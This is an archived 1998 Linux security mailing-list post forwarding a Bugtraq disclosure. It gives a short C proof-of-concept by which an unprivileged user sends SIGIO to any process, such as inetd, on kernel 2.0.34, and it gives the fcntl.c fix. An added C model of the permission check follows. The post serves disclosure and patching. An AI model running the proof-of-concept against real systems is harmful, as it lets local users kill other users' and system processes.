[1957] in linux-security and linux-alert archive
[linux-security] Serious Linux 2.0.34 security problem (fwd)
daemon@ATHENA.MIT.EDU (Annex)
Sun Jul 5 04:51:38 1998
Date: Thu, 2 Jul 1998 11:03:32 +0600 (BGT)
From: Annex <annex@thing.annexgrp.org>
To: linux-security@redhat.com
Resent-From: linux-security@redhat.com
Resent-Reply-To: linux-security@redhat.com
---------- Forwarded message ----------
Date: Tue, 30 Jun 1998 15:10:47 +0800
From: David Luyer <luyer@UCS.UWA.EDU.AU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Serious Linux 2.0.34 security problem
I just saw this mentioned on linux-kernel and confirmed it;
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    int s, p;

    if (argc != 2) {
        fputs("Please specify a pid to send signal to.\n", stderr);
        exit(0);
    } else {
        p = atoi(argv[1]);
    }
    /* Name pid p as the recipient of SIGIO for stdin. */
    fcntl(0, F_SETOWN, p);
    /* Turn on async notification; input on stdin then raises SIGIO. */
    s = fcntl(0, F_GETFL, 0);
    fcntl(0, F_SETFL, s | O_ASYNC);
    printf("Sending SIGIO - press enter.\n");
    getchar();
    /* Restore the original file status flags. */
    fcntl(0, F_SETFL, s & ~O_ASYNC);
    printf("SIGIO send attempted.\n");
    return 0;
}
This can kill from a normal user account the inetd process under Linux
2.0.34 by sending a SIGIO. Very bad.
The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
is approximately 139.
David.
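
An added example, not part of the original post and not kernel source: a user-space C model of the permission guard the fix refers to, showing which senders each form of the guard lets through. Only the `!euid` versus `euid` guard comes from the message; the id-matching rule, the struct and all function names are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdio.h>

/* Constructed credential triple; field names are illustrative. */
struct cred { unsigned uid, euid, suid; };

/* Constructed sample identities. */
static const struct cred USER  = { 1000, 1000, 1000 };
static const struct cred OTHER = { 1001, 1001, 1001 };
static const struct cred ROOT  = { 0, 0, 0 };   /* e.g. inetd */

/* Assumption: ids "match" when the sender's uid or euid equals the
 * target's uid or suid, the rule kill(2) applies to non-root senders. */
static bool ids_match(const struct cred *s, const struct cred *t)
{
    return s->euid == t->suid || s->euid == t->uid ||
           s->uid  == t->suid || s->uid  == t->uid;
}

/* Guard as reported for 2.0.34: the id comparison runs only when
 * euid == 0, so a non-root sender is never compared with the target. */
bool sigio_allowed_2_0_34(const struct cred *s, const struct cred *t)
{
    return !(!s->euid && !ids_match(s, t));
}

/* Guard after the fix: root bypasses the comparison, everyone else
 * must match the target. */
bool sigio_allowed_fixed(const struct cred *s, const struct cred *t)
{
    return !(s->euid && !ids_match(s, t));
}

int main(void)
{
    const struct { const char *name; const struct cred *s, *t; } c[] = {
        { "user -> root daemon", &USER, &ROOT  },
        { "user -> other user",  &USER, &OTHER },
        { "user -> own process", &USER, &USER  },
        { "root -> user",        &ROOT, &USER  },
    };
    for (unsigned i = 0; i < sizeof c / sizeof c[0]; i++)
        printf("%-20s 2.0.34=%d fixed=%d\n", c[i].name,
               sigio_allowed_2_0_34(c[i].s, c[i].t),
               sigio_allowed_fixed(c[i].s, c[i].t));
    return 0;
}
```

In this model the 2.0.34 form of the guard also refuses a root sender whose ids differ from the target's, the mirror image of the intended rule.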